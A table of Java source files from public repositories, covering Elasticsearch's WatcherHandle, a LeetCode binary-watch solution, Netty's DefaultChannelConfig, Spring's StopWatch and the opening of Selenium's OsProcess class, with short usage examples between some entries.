file_id | content | repo | path
---|---|---|---|
1,001 | /*
* Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
* or more contributor license agreements. Licensed under the Elastic License
* 2.0 and the Server Side Public License, v 1; you may not use this file except
* in compliance with, at your election, the Elastic License 2.0 or the Server
* Side Public License, v 1.
*/
package org.elasticsearch.watcher;
public class WatcherHandle<W extends ResourceWatcher> {
private final ResourceWatcherService.ResourceMonitor monitor;
private final W watcher;
WatcherHandle(ResourceWatcherService.ResourceMonitor monitor, W watcher) {
this.monitor = monitor;
this.watcher = watcher;
}
public W watcher() {
return watcher;
}
public ResourceWatcherService.Frequency frequency() {
return monitor.frequency;
}
public void stop() {
monitor.watchers.remove(watcher);
}
public void resume() {
monitor.watchers.add(watcher);
}
}
| elastic/elasticsearch | server/src/main/java/org/elasticsearch/watcher/WatcherHandle.java |
1,002 | // A binary watch has 4 LEDs on the top which represent the hours (0-11), and the 6 LEDs on the bottom represent the minutes (0-59).
// Each LED represents a zero or one, with the least significant bit on the right.
// For example, a watch showing the binary values for 3 (hours) and 25 (minutes) reads "3:25".
// Given a non-negative integer n which represents the number of LEDs that are currently on, return all possible times the watch could represent.
// Example:
// Input: n = 1
// Return: ["1:00", "2:00", "4:00", "8:00", "0:01", "0:02", "0:04", "0:08", "0:16", "0:32"]
// Note:
// The order of output does not matter.
// The hour must not contain a leading zero, for example "01:00" is not valid, it should be "1:00".
// The minute must consist of two digits and may contain a leading zero, for example "10:2" is not valid, it should be "10:02".
import java.util.ArrayList;
import java.util.List;

public class BinaryWatch {
public List<String> readBinaryWatch(int num) {
ArrayList<String> allTimes = new ArrayList<String>();
//iterate through all possible time combinations
for(int i = 0; i < 12; i++) {
for(int j = 0; j < 60; j++) {
//if the packed hour/minute value has the same number of set bits as num, the time is possible
if(Integer.bitCount(i * 64 + j) == num) {
//add the current time to all times arraylist
allTimes.add(String.format("%d:%02d", i, j));
}
}
}
return allTimes;
}
}
| kdn251/interviews | leetcode/bit-manipulation/BinaryWatch.java |
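A minimal usage sketch for the BinaryWatch solution above; the BinaryWatchDemo class name is invented for this example, and the problem statement allows the results in any order.
import java.util.List;

public class BinaryWatchDemo {
    public static void main(String[] args) {
        // With exactly one LED lit, every single-bit hour or minute value is reachable.
        List<String> times = new BinaryWatch().readBinaryWatch(1);
        System.out.println(times); // [0:01, 0:02, 0:04, 0:08, 0:16, 0:32, 1:00, 2:00, 4:00, 8:00]
    }
}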
1,003 | /*
* Copyright 2012 The Netty Project
*
* The Netty Project licenses this file to you under the Apache License,
* version 2.0 (the "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at:
*
* https://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
* WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
* License for the specific language governing permissions and limitations
* under the License.
*/
package io.netty.channel;
import io.netty.buffer.ByteBufAllocator;
import io.netty.util.internal.ObjectUtil;
import java.util.IdentityHashMap;
import java.util.Map;
import java.util.Map.Entry;
import java.util.concurrent.atomic.AtomicIntegerFieldUpdater;
import java.util.concurrent.atomic.AtomicReferenceFieldUpdater;
import static io.netty.channel.ChannelOption.ALLOCATOR;
import static io.netty.channel.ChannelOption.AUTO_CLOSE;
import static io.netty.channel.ChannelOption.AUTO_READ;
import static io.netty.channel.ChannelOption.CONNECT_TIMEOUT_MILLIS;
import static io.netty.channel.ChannelOption.MAX_MESSAGES_PER_READ;
import static io.netty.channel.ChannelOption.MAX_MESSAGES_PER_WRITE;
import static io.netty.channel.ChannelOption.MESSAGE_SIZE_ESTIMATOR;
import static io.netty.channel.ChannelOption.RCVBUF_ALLOCATOR;
import static io.netty.channel.ChannelOption.SINGLE_EVENTEXECUTOR_PER_GROUP;
import static io.netty.channel.ChannelOption.WRITE_BUFFER_HIGH_WATER_MARK;
import static io.netty.channel.ChannelOption.WRITE_BUFFER_LOW_WATER_MARK;
import static io.netty.channel.ChannelOption.WRITE_BUFFER_WATER_MARK;
import static io.netty.channel.ChannelOption.WRITE_SPIN_COUNT;
import static io.netty.util.internal.ObjectUtil.checkNotNull;
import static io.netty.util.internal.ObjectUtil.checkPositive;
import static io.netty.util.internal.ObjectUtil.checkPositiveOrZero;
/**
* The default {@link ChannelConfig} implementation.
*/
public class DefaultChannelConfig implements ChannelConfig {
private static final MessageSizeEstimator DEFAULT_MSG_SIZE_ESTIMATOR = DefaultMessageSizeEstimator.DEFAULT;
private static final int DEFAULT_CONNECT_TIMEOUT = 30000;
private static final AtomicIntegerFieldUpdater<DefaultChannelConfig> AUTOREAD_UPDATER =
AtomicIntegerFieldUpdater.newUpdater(DefaultChannelConfig.class, "autoRead");
private static final AtomicReferenceFieldUpdater<DefaultChannelConfig, WriteBufferWaterMark> WATERMARK_UPDATER =
AtomicReferenceFieldUpdater.newUpdater(
DefaultChannelConfig.class, WriteBufferWaterMark.class, "writeBufferWaterMark");
protected final Channel channel;
private volatile ByteBufAllocator allocator = ByteBufAllocator.DEFAULT;
private volatile RecvByteBufAllocator rcvBufAllocator;
private volatile MessageSizeEstimator msgSizeEstimator = DEFAULT_MSG_SIZE_ESTIMATOR;
private volatile int connectTimeoutMillis = DEFAULT_CONNECT_TIMEOUT;
private volatile int writeSpinCount = 16;
private volatile int maxMessagesPerWrite = Integer.MAX_VALUE;
@SuppressWarnings("FieldMayBeFinal")
private volatile int autoRead = 1;
private volatile boolean autoClose = true;
private volatile WriteBufferWaterMark writeBufferWaterMark = WriteBufferWaterMark.DEFAULT;
private volatile boolean pinEventExecutor = true;
public DefaultChannelConfig(Channel channel) {
this(channel, new AdaptiveRecvByteBufAllocator());
}
protected DefaultChannelConfig(Channel channel, RecvByteBufAllocator allocator) {
setRecvByteBufAllocator(allocator, channel.metadata());
this.channel = channel;
}
@Override
@SuppressWarnings("deprecation")
public Map<ChannelOption<?>, Object> getOptions() {
return getOptions(
null,
CONNECT_TIMEOUT_MILLIS, MAX_MESSAGES_PER_READ, WRITE_SPIN_COUNT,
ALLOCATOR, AUTO_READ, AUTO_CLOSE, RCVBUF_ALLOCATOR, WRITE_BUFFER_HIGH_WATER_MARK,
WRITE_BUFFER_LOW_WATER_MARK, WRITE_BUFFER_WATER_MARK, MESSAGE_SIZE_ESTIMATOR,
SINGLE_EVENTEXECUTOR_PER_GROUP, MAX_MESSAGES_PER_WRITE);
}
protected Map<ChannelOption<?>, Object> getOptions(
Map<ChannelOption<?>, Object> result, ChannelOption<?>... options) {
if (result == null) {
result = new IdentityHashMap<ChannelOption<?>, Object>();
}
for (ChannelOption<?> o: options) {
result.put(o, getOption(o));
}
return result;
}
@SuppressWarnings("unchecked")
@Override
public boolean setOptions(Map<ChannelOption<?>, ?> options) {
ObjectUtil.checkNotNull(options, "options");
boolean setAllOptions = true;
for (Entry<ChannelOption<?>, ?> e: options.entrySet()) {
if (!setOption((ChannelOption<Object>) e.getKey(), e.getValue())) {
setAllOptions = false;
}
}
return setAllOptions;
}
@Override
@SuppressWarnings({ "unchecked", "deprecation" })
public <T> T getOption(ChannelOption<T> option) {
ObjectUtil.checkNotNull(option, "option");
if (option == CONNECT_TIMEOUT_MILLIS) {
return (T) Integer.valueOf(getConnectTimeoutMillis());
}
if (option == MAX_MESSAGES_PER_READ) {
return (T) Integer.valueOf(getMaxMessagesPerRead());
}
if (option == WRITE_SPIN_COUNT) {
return (T) Integer.valueOf(getWriteSpinCount());
}
if (option == ALLOCATOR) {
return (T) getAllocator();
}
if (option == RCVBUF_ALLOCATOR) {
return (T) getRecvByteBufAllocator();
}
if (option == AUTO_READ) {
return (T) Boolean.valueOf(isAutoRead());
}
if (option == AUTO_CLOSE) {
return (T) Boolean.valueOf(isAutoClose());
}
if (option == WRITE_BUFFER_HIGH_WATER_MARK) {
return (T) Integer.valueOf(getWriteBufferHighWaterMark());
}
if (option == WRITE_BUFFER_LOW_WATER_MARK) {
return (T) Integer.valueOf(getWriteBufferLowWaterMark());
}
if (option == WRITE_BUFFER_WATER_MARK) {
return (T) getWriteBufferWaterMark();
}
if (option == MESSAGE_SIZE_ESTIMATOR) {
return (T) getMessageSizeEstimator();
}
if (option == SINGLE_EVENTEXECUTOR_PER_GROUP) {
return (T) Boolean.valueOf(getPinEventExecutorPerGroup());
}
if (option == MAX_MESSAGES_PER_WRITE) {
return (T) Integer.valueOf(getMaxMessagesPerWrite());
}
return null;
}
@Override
@SuppressWarnings("deprecation")
public <T> boolean setOption(ChannelOption<T> option, T value) {
validate(option, value);
if (option == CONNECT_TIMEOUT_MILLIS) {
setConnectTimeoutMillis((Integer) value);
} else if (option == MAX_MESSAGES_PER_READ) {
setMaxMessagesPerRead((Integer) value);
} else if (option == WRITE_SPIN_COUNT) {
setWriteSpinCount((Integer) value);
} else if (option == ALLOCATOR) {
setAllocator((ByteBufAllocator) value);
} else if (option == RCVBUF_ALLOCATOR) {
setRecvByteBufAllocator((RecvByteBufAllocator) value);
} else if (option == AUTO_READ) {
setAutoRead((Boolean) value);
} else if (option == AUTO_CLOSE) {
setAutoClose((Boolean) value);
} else if (option == WRITE_BUFFER_HIGH_WATER_MARK) {
setWriteBufferHighWaterMark((Integer) value);
} else if (option == WRITE_BUFFER_LOW_WATER_MARK) {
setWriteBufferLowWaterMark((Integer) value);
} else if (option == WRITE_BUFFER_WATER_MARK) {
setWriteBufferWaterMark((WriteBufferWaterMark) value);
} else if (option == MESSAGE_SIZE_ESTIMATOR) {
setMessageSizeEstimator((MessageSizeEstimator) value);
} else if (option == SINGLE_EVENTEXECUTOR_PER_GROUP) {
setPinEventExecutorPerGroup((Boolean) value);
} else if (option == MAX_MESSAGES_PER_WRITE) {
setMaxMessagesPerWrite((Integer) value);
} else {
return false;
}
return true;
}
protected <T> void validate(ChannelOption<T> option, T value) {
ObjectUtil.checkNotNull(option, "option").validate(value);
}
@Override
public int getConnectTimeoutMillis() {
return connectTimeoutMillis;
}
@Override
public ChannelConfig setConnectTimeoutMillis(int connectTimeoutMillis) {
checkPositiveOrZero(connectTimeoutMillis, "connectTimeoutMillis");
this.connectTimeoutMillis = connectTimeoutMillis;
return this;
}
/**
* {@inheritDoc}
* <p>
* @throws IllegalStateException if {@link #getRecvByteBufAllocator()} does not return an object of type
* {@link MaxMessagesRecvByteBufAllocator}.
*/
@Override
@Deprecated
public int getMaxMessagesPerRead() {
try {
MaxMessagesRecvByteBufAllocator allocator = getRecvByteBufAllocator();
return allocator.maxMessagesPerRead();
} catch (ClassCastException e) {
throw new IllegalStateException("getRecvByteBufAllocator() must return an object of type " +
"MaxMessagesRecvByteBufAllocator", e);
}
}
/**
* {@inheritDoc}
* <p>
* @throws IllegalStateException if {@link #getRecvByteBufAllocator()} does not return an object of type
* {@link MaxMessagesRecvByteBufAllocator}.
*/
@Override
@Deprecated
public ChannelConfig setMaxMessagesPerRead(int maxMessagesPerRead) {
try {
MaxMessagesRecvByteBufAllocator allocator = getRecvByteBufAllocator();
allocator.maxMessagesPerRead(maxMessagesPerRead);
return this;
} catch (ClassCastException e) {
throw new IllegalStateException("getRecvByteBufAllocator() must return an object of type " +
"MaxMessagesRecvByteBufAllocator", e);
}
}
/**
* Get the maximum number of messages to write per event loop run. Once this limit is
* reached we will continue to process other events before trying to write the remaining messages.
*/
public int getMaxMessagesPerWrite() {
return maxMessagesPerWrite;
}
/**
* Set the maximum number of messages to write per event loop run. Once this limit is
* reached we will continue to process other events before trying to write the remaining messages.
*/
public ChannelConfig setMaxMessagesPerWrite(int maxMessagesPerWrite) {
this.maxMessagesPerWrite = ObjectUtil.checkPositive(maxMessagesPerWrite, "maxMessagesPerWrite");
return this;
}
@Override
public int getWriteSpinCount() {
return writeSpinCount;
}
@Override
public ChannelConfig setWriteSpinCount(int writeSpinCount) {
checkPositive(writeSpinCount, "writeSpinCount");
// Integer.MAX_VALUE is used as a special value in the channel implementations to indicate the channel cannot
// accept any more data, and results in the writeOp being set on the selector (or execute a runnable which tries
// to flush later because the writeSpinCount quantum has been exhausted). This strategy prevents additional
// conditional logic in the channel implementations, and shouldn't be noticeable in practice.
if (writeSpinCount == Integer.MAX_VALUE) {
--writeSpinCount;
}
this.writeSpinCount = writeSpinCount;
return this;
}
@Override
public ByteBufAllocator getAllocator() {
return allocator;
}
@Override
public ChannelConfig setAllocator(ByteBufAllocator allocator) {
this.allocator = ObjectUtil.checkNotNull(allocator, "allocator");
return this;
}
@SuppressWarnings("unchecked")
@Override
public <T extends RecvByteBufAllocator> T getRecvByteBufAllocator() {
return (T) rcvBufAllocator;
}
@Override
public ChannelConfig setRecvByteBufAllocator(RecvByteBufAllocator allocator) {
rcvBufAllocator = checkNotNull(allocator, "allocator");
return this;
}
/**
* Set the {@link RecvByteBufAllocator} which is used for the channel to allocate receive buffers.
* @param allocator the allocator to set.
* @param metadata Used to set the {@link ChannelMetadata#defaultMaxMessagesPerRead()} if {@code allocator}
* is of type {@link MaxMessagesRecvByteBufAllocator}.
*/
private void setRecvByteBufAllocator(RecvByteBufAllocator allocator, ChannelMetadata metadata) {
checkNotNull(allocator, "allocator");
checkNotNull(metadata, "metadata");
if (allocator instanceof MaxMessagesRecvByteBufAllocator) {
((MaxMessagesRecvByteBufAllocator) allocator).maxMessagesPerRead(metadata.defaultMaxMessagesPerRead());
}
setRecvByteBufAllocator(allocator);
}
@Override
public boolean isAutoRead() {
return autoRead == 1;
}
@Override
public ChannelConfig setAutoRead(boolean autoRead) {
boolean oldAutoRead = AUTOREAD_UPDATER.getAndSet(this, autoRead ? 1 : 0) == 1;
if (autoRead && !oldAutoRead) {
channel.read();
} else if (!autoRead && oldAutoRead) {
autoReadCleared();
}
return this;
}
/**
* Is called once {@link #setAutoRead(boolean)} is called with {@code false} and {@link #isAutoRead()} was
* {@code true} before.
*/
protected void autoReadCleared() { }
@Override
public boolean isAutoClose() {
return autoClose;
}
@Override
public ChannelConfig setAutoClose(boolean autoClose) {
this.autoClose = autoClose;
return this;
}
@Override
public int getWriteBufferHighWaterMark() {
return writeBufferWaterMark.high();
}
@Override
public ChannelConfig setWriteBufferHighWaterMark(int writeBufferHighWaterMark) {
checkPositiveOrZero(writeBufferHighWaterMark, "writeBufferHighWaterMark");
for (;;) {
WriteBufferWaterMark waterMark = writeBufferWaterMark;
if (writeBufferHighWaterMark < waterMark.low()) {
throw new IllegalArgumentException(
"writeBufferHighWaterMark cannot be less than " +
"writeBufferLowWaterMark (" + waterMark.low() + "): " +
writeBufferHighWaterMark);
}
if (WATERMARK_UPDATER.compareAndSet(this, waterMark,
new WriteBufferWaterMark(waterMark.low(), writeBufferHighWaterMark, false))) {
return this;
}
}
}
@Override
public int getWriteBufferLowWaterMark() {
return writeBufferWaterMark.low();
}
@Override
public ChannelConfig setWriteBufferLowWaterMark(int writeBufferLowWaterMark) {
checkPositiveOrZero(writeBufferLowWaterMark, "writeBufferLowWaterMark");
for (;;) {
WriteBufferWaterMark waterMark = writeBufferWaterMark;
if (writeBufferLowWaterMark > waterMark.high()) {
throw new IllegalArgumentException(
"writeBufferLowWaterMark cannot be greater than " +
"writeBufferHighWaterMark (" + waterMark.high() + "): " +
writeBufferLowWaterMark);
}
if (WATERMARK_UPDATER.compareAndSet(this, waterMark,
new WriteBufferWaterMark(writeBufferLowWaterMark, waterMark.high(), false))) {
return this;
}
}
}
@Override
public ChannelConfig setWriteBufferWaterMark(WriteBufferWaterMark writeBufferWaterMark) {
this.writeBufferWaterMark = checkNotNull(writeBufferWaterMark, "writeBufferWaterMark");
return this;
}
@Override
public WriteBufferWaterMark getWriteBufferWaterMark() {
return writeBufferWaterMark;
}
@Override
public MessageSizeEstimator getMessageSizeEstimator() {
return msgSizeEstimator;
}
@Override
public ChannelConfig setMessageSizeEstimator(MessageSizeEstimator estimator) {
this.msgSizeEstimator = ObjectUtil.checkNotNull(estimator, "estimator");
return this;
}
private ChannelConfig setPinEventExecutorPerGroup(boolean pinEventExecutor) {
this.pinEventExecutor = pinEventExecutor;
return this;
}
private boolean getPinEventExecutorPerGroup() {
return pinEventExecutor;
}
}
| netty/netty | transport/src/main/java/io/netty/channel/DefaultChannelConfig.java |
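A hedged sketch of exercising the option round-trip implemented above, using Netty's in-memory EmbeddedChannel; the timeout value is arbitrary, and the channel type is simply one convenient way to obtain a config backed by this implementation.
import io.netty.channel.ChannelConfig;
import io.netty.channel.ChannelOption;
import io.netty.channel.embedded.EmbeddedChannel;

public class ChannelConfigDemo {
    public static void main(String[] args) {
        EmbeddedChannel channel = new EmbeddedChannel();
        ChannelConfig config = channel.config();

        // setOption dispatches to the matching setter and reports whether the option was recognized.
        boolean known = config.setOption(ChannelOption.CONNECT_TIMEOUT_MILLIS, 5000);
        System.out.println(known + " -> " + config.getOption(ChannelOption.CONNECT_TIMEOUT_MILLIS) + " ms");

        channel.finish();
    }
}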
1,004 | /*
* Copyright 2002-2023 the original author or authors.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* https://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.springframework.util;
import java.text.NumberFormat;
import java.util.ArrayList;
import java.util.List;
import java.util.Locale;
import java.util.concurrent.TimeUnit;
import org.springframework.lang.Nullable;
/**
* Simple stop watch, allowing for timing of a number of tasks, exposing total
* running time and running time for each named task.
*
* <p>Conceals use of {@link System#nanoTime()}, improving the readability of
* application code and reducing the likelihood of calculation errors.
*
* <p>Note that this object is not designed to be thread-safe and does not use
* synchronization.
*
* <p>This class is normally used to verify performance during proof-of-concept
* work and in development, rather than as part of production applications.
*
* <p>As of Spring Framework 5.2, running time is tracked and reported in
* nanoseconds. As of 6.1, the default time unit for String renderings is
* seconds with decimal points in nanosecond precision. Custom renderings with
* specific time units can be requested through {@link #prettyPrint(TimeUnit)}.
*
* @author Rod Johnson
* @author Juergen Hoeller
* @author Sam Brannen
* @since May 2, 2001
* @see #start()
* @see #stop()
* @see #shortSummary()
* @see #prettyPrint()
*/
public class StopWatch {
/**
* Identifier of this {@code StopWatch}.
* <p>Handy when we have output from multiple stop watches and need to
* distinguish between them in log or console output.
*/
private final String id;
@Nullable
private List<TaskInfo> taskList = new ArrayList<>(1);
/** Start time of the current task. */
private long startTimeNanos;
/** Name of the current task. */
@Nullable
private String currentTaskName;
@Nullable
private TaskInfo lastTaskInfo;
private int taskCount;
/** Total running time. */
private long totalTimeNanos;
/**
* Construct a new {@code StopWatch}.
* <p>Does not start any task.
*/
public StopWatch() {
this("");
}
/**
* Construct a new {@code StopWatch} with the given id.
* <p>The id is handy when we have output from multiple stop watches and need
* to distinguish between them.
* <p>Does not start any task.
* @param id identifier for this stop watch
*/
public StopWatch(String id) {
this.id = id;
}
/**
* Get the id of this {@code StopWatch}, as specified on construction.
* @return the id (empty String by default)
* @since 4.2.2
* @see #StopWatch(String)
*/
public String getId() {
return this.id;
}
/**
* Configure whether the {@link TaskInfo} array is built over time.
* <p>Set this to {@code false} when using a {@code StopWatch} for millions of
* tasks; otherwise, the {@code TaskInfo} structure will consume excessive memory.
* <p>Default is {@code true}.
*/
public void setKeepTaskList(boolean keepTaskList) {
this.taskList = (keepTaskList ? new ArrayList<>() : null);
}
/**
* Start an unnamed task.
* <p>The results are undefined if {@link #stop()} or timing methods are
* called without invoking this method first.
* @see #start(String)
* @see #stop()
*/
public void start() throws IllegalStateException {
start("");
}
/**
* Start a named task.
* <p>The results are undefined if {@link #stop()} or timing methods are
* called without invoking this method first.
* @param taskName the name of the task to start
* @see #start()
* @see #stop()
*/
public void start(String taskName) throws IllegalStateException {
if (this.currentTaskName != null) {
throw new IllegalStateException("Can't start StopWatch: it's already running");
}
this.currentTaskName = taskName;
this.startTimeNanos = System.nanoTime();
}
/**
* Stop the current task.
* <p>The results are undefined if timing methods are called without invoking
* at least one pair of {@code start()} / {@code stop()} methods.
* @see #start()
* @see #start(String)
*/
public void stop() throws IllegalStateException {
if (this.currentTaskName == null) {
throw new IllegalStateException("Can't stop StopWatch: it's not running");
}
long lastTime = System.nanoTime() - this.startTimeNanos;
this.totalTimeNanos += lastTime;
this.lastTaskInfo = new TaskInfo(this.currentTaskName, lastTime);
if (this.taskList != null) {
this.taskList.add(this.lastTaskInfo);
}
++this.taskCount;
this.currentTaskName = null;
}
/**
* Determine whether this {@code StopWatch} is currently running.
* @see #currentTaskName()
*/
public boolean isRunning() {
return (this.currentTaskName != null);
}
/**
* Get the name of the currently running task, if any.
* @since 4.2.2
* @see #isRunning()
*/
@Nullable
public String currentTaskName() {
return this.currentTaskName;
}
/**
* Get the last task as a {@link TaskInfo} object.
* @throws IllegalStateException if no tasks have run yet
* @since 6.1
*/
public TaskInfo lastTaskInfo() throws IllegalStateException {
Assert.state(this.lastTaskInfo != null, "No tasks run");
return this.lastTaskInfo;
}
/**
* Get the last task as a {@link TaskInfo} object.
* @deprecated as of 6.1, in favor of {@link #lastTaskInfo()}
*/
@Deprecated(since = "6.1")
public TaskInfo getLastTaskInfo() throws IllegalStateException {
return lastTaskInfo();
}
/**
* Get the name of the last task.
* @see TaskInfo#getTaskName()
* @deprecated as of 6.1, in favor of {@link #lastTaskInfo()}
*/
@Deprecated(since = "6.1")
public String getLastTaskName() throws IllegalStateException {
return lastTaskInfo().getTaskName();
}
/**
* Get the time taken by the last task in nanoseconds.
* @since 5.2
* @see TaskInfo#getTimeNanos()
* @deprecated as of 6.1, in favor of {@link #lastTaskInfo()}
*/
@Deprecated(since = "6.1")
public long getLastTaskTimeNanos() throws IllegalStateException {
return lastTaskInfo().getTimeNanos();
}
/**
* Get the time taken by the last task in milliseconds.
* @see TaskInfo#getTimeMillis()
* @deprecated as of 6.1, in favor of {@link #lastTaskInfo()}
*/
@Deprecated(since = "6.1")
public long getLastTaskTimeMillis() throws IllegalStateException {
return lastTaskInfo().getTimeMillis();
}
/**
* Get an array of the data for tasks performed.
* @see #setKeepTaskList
*/
public TaskInfo[] getTaskInfo() {
if (this.taskList == null) {
throw new UnsupportedOperationException("Task info is not being kept!");
}
return this.taskList.toArray(new TaskInfo[0]);
}
/**
* Get the number of tasks timed.
*/
public int getTaskCount() {
return this.taskCount;
}
/**
* Get the total time for all tasks in nanoseconds.
* @since 5.2
* @see #getTotalTime(TimeUnit)
*/
public long getTotalTimeNanos() {
return this.totalTimeNanos;
}
/**
* Get the total time for all tasks in milliseconds.
* @see #getTotalTime(TimeUnit)
*/
public long getTotalTimeMillis() {
return TimeUnit.NANOSECONDS.toMillis(this.totalTimeNanos);
}
/**
* Get the total time for all tasks in seconds.
* @see #getTotalTime(TimeUnit)
*/
public double getTotalTimeSeconds() {
return getTotalTime(TimeUnit.SECONDS);
}
/**
* Get the total time for all tasks in the requested time unit
* (with decimal points in nanosecond precision).
* @param timeUnit the unit to use
* @since 6.1
* @see #getTotalTimeNanos()
* @see #getTotalTimeMillis()
* @see #getTotalTimeSeconds()
*/
public double getTotalTime(TimeUnit timeUnit) {
return (double) this.totalTimeNanos / TimeUnit.NANOSECONDS.convert(1, timeUnit);
}
/**
* Generate a table describing all tasks performed in seconds
* (with decimal points in nanosecond precision).
* <p>For custom reporting, call {@link #getTaskInfo()} and use the data directly.
* @see #prettyPrint(TimeUnit)
* @see #getTotalTimeSeconds()
* @see TaskInfo#getTimeSeconds()
*/
public String prettyPrint() {
return prettyPrint(TimeUnit.SECONDS);
}
/**
* Generate a table describing all tasks performed in the requested time unit
* (with decimal points in nanosecond precision).
* <p>For custom reporting, call {@link #getTaskInfo()} and use the data directly.
* @param timeUnit the unit to use for rendering total time and task time
* @since 6.1
* @see #prettyPrint()
* @see #getTotalTime(TimeUnit)
* @see TaskInfo#getTime(TimeUnit)
*/
public String prettyPrint(TimeUnit timeUnit) {
NumberFormat nf = NumberFormat.getNumberInstance(Locale.ENGLISH);
nf.setMaximumFractionDigits(9);
nf.setGroupingUsed(false);
NumberFormat pf = NumberFormat.getPercentInstance(Locale.ENGLISH);
pf.setMinimumIntegerDigits(2);
pf.setGroupingUsed(false);
StringBuilder sb = new StringBuilder(128);
sb.append("StopWatch '").append(getId()).append("': ");
String total = (timeUnit == TimeUnit.NANOSECONDS ?
nf.format(getTotalTimeNanos()) : nf.format(getTotalTime(timeUnit)));
sb.append(total).append(" ").append(timeUnit.name().toLowerCase(Locale.ENGLISH));
int width = Math.max(sb.length(), 40);
sb.append("\n");
if (this.taskList != null) {
String line = "-".repeat(width) + "\n";
String unitName = timeUnit.name();
unitName = unitName.charAt(0) + unitName.substring(1).toLowerCase(Locale.ENGLISH);
unitName = String.format("%-12s", unitName);
sb.append(line);
sb.append(unitName).append(" % Task name\n");
sb.append(line);
int digits = total.indexOf('.');
if (digits < 0) {
digits = total.length();
}
nf.setMinimumIntegerDigits(digits);
nf.setMaximumFractionDigits(10 - digits);
for (TaskInfo task : this.taskList) {
sb.append(String.format("%-14s", (timeUnit == TimeUnit.NANOSECONDS ?
nf.format(task.getTimeNanos()) : nf.format(task.getTime(timeUnit)))));
sb.append(String.format("%-8s",
pf.format(task.getTimeSeconds() / getTotalTimeSeconds())));
sb.append(task.getTaskName()).append('\n');
}
}
else {
sb.append("No task info kept");
}
return sb.toString();
}
/**
* Get a short description of the total running time in seconds.
* @see #prettyPrint()
* @see #prettyPrint(TimeUnit)
*/
public String shortSummary() {
return "StopWatch '" + getId() + "': " + getTotalTimeSeconds() + " seconds";
}
/**
* Generate an informative string describing all tasks performed in seconds.
* @see #prettyPrint()
* @see #prettyPrint(TimeUnit)
*/
@Override
public String toString() {
StringBuilder sb = new StringBuilder(shortSummary());
if (this.taskList != null) {
for (TaskInfo task : this.taskList) {
sb.append("; [").append(task.getTaskName()).append("] took ").append(task.getTimeSeconds()).append(" seconds");
long percent = Math.round(100.0 * task.getTimeSeconds() / getTotalTimeSeconds());
sb.append(" = ").append(percent).append('%');
}
}
else {
sb.append("; no task info kept");
}
return sb.toString();
}
/**
* Nested class to hold data about one task executed within the {@code StopWatch}.
*/
public static final class TaskInfo {
private final String taskName;
private final long timeNanos;
TaskInfo(String taskName, long timeNanos) {
this.taskName = taskName;
this.timeNanos = timeNanos;
}
/**
* Get the name of this task.
*/
public String getTaskName() {
return this.taskName;
}
/**
* Get the time this task took in nanoseconds.
* @since 5.2
* @see #getTime(TimeUnit)
*/
public long getTimeNanos() {
return this.timeNanos;
}
/**
* Get the time this task took in milliseconds.
* @see #getTime(TimeUnit)
*/
public long getTimeMillis() {
return TimeUnit.NANOSECONDS.toMillis(this.timeNanos);
}
/**
* Get the time this task took in seconds.
* @see #getTime(TimeUnit)
*/
public double getTimeSeconds() {
return getTime(TimeUnit.SECONDS);
}
/**
* Get the time this task took in the requested time unit
* (with decimal points in nanosecond precision).
* @param timeUnit the unit to use
* @since 6.1
* @see #getTimeNanos()
* @see #getTimeMillis()
* @see #getTimeSeconds()
*/
public double getTime(TimeUnit timeUnit) {
return (double) this.timeNanos / TimeUnit.NANOSECONDS.convert(1, timeUnit);
}
}
}
| spring-projects/spring-framework | spring-core/src/main/java/org/springframework/util/StopWatch.java |
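A brief usage sketch for the StopWatch above; the task names and sleep durations are arbitrary, chosen only to produce two entries in the pretty-printed table.
import java.util.concurrent.TimeUnit;
import org.springframework.util.StopWatch;

public class StopWatchDemo {
    public static void main(String[] args) throws InterruptedException {
        StopWatch watch = new StopWatch("demo");

        watch.start("load");
        Thread.sleep(50);
        watch.stop();

        watch.start("process");
        Thread.sleep(10);
        watch.stop();

        // Time is tracked in nanoseconds; prettyPrint renders it in the requested unit.
        System.out.println(watch.prettyPrint(TimeUnit.MILLISECONDS));
        System.out.println(watch.shortSummary());
    }
}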
1,005 | // Licensed to the Software Freedom Conservancy (SFC) under one
// or more contributor license agreements. See the NOTICE file
// distributed with this work for additional information
// regarding copyright ownership. The SFC licenses this file
// to you under the Apache License, Version 2.0 (the
// "License"); you may not use this file except in compliance
// with the License. You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing,
// software distributed under the License is distributed on an
// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
// KIND, either express or implied. See the License for the
// specific language governing permissions and limitations
// under the License.
package org.openqa.selenium.os;
import static java.util.Collections.unmodifiableMap;
import static java.util.concurrent.TimeUnit.SECONDS;
import static org.openqa.selenium.Platform.WINDOWS;
import java.io.ByteArrayInputStream;
import java.io.File;
import java.io.IOException;
import java.io.OutputStream;
import java.nio.charset.Charset;
import java.util.HashMap;
import java.util.Map;
import java.util.concurrent.ConcurrentHashMap;
import java.util.concurrent.TimeUnit;
import java.util.logging.Level;
import java.util.logging.Logger;
import org.apache.commons.exec.DaemonExecutor;
import org.apache.commons.exec.DefaultExecuteResultHandler;
import org.apache.commons.exec.ExecuteWatchdog;
import org.apache.commons.exec.Executor;
import org.apache.commons.exec.PumpStreamHandler;
import org.openqa.selenium.Platform;
import org.openqa.selenium.TimeoutException;
import org.openqa.selenium.WebDriverException;
import org.openqa.selenium.internal.Require;
import org.openqa.selenium.io.CircularOutputStream;
import org.openqa.selenium.io.MultiOutputStream;
@Deprecated
class OsProcess {
private static final Logger LOG = Logger.getLogger(OsProcess.class.getName());
private final CircularOutputStream inputOut = new CircularOutputStream(32768);
private volatile String allInput;
private final DefaultExecuteResultHandler handler = new DefaultExecuteResultHandler();
private final Executor executor = new DaemonExecutor();
private volatile OutputStream drainTo;
private final SeleniumWatchDog executeWatchdog =
new SeleniumWatchDog(ExecuteWatchdog.INFINITE_TIMEOUT);
private PumpStreamHandler streamHandler;
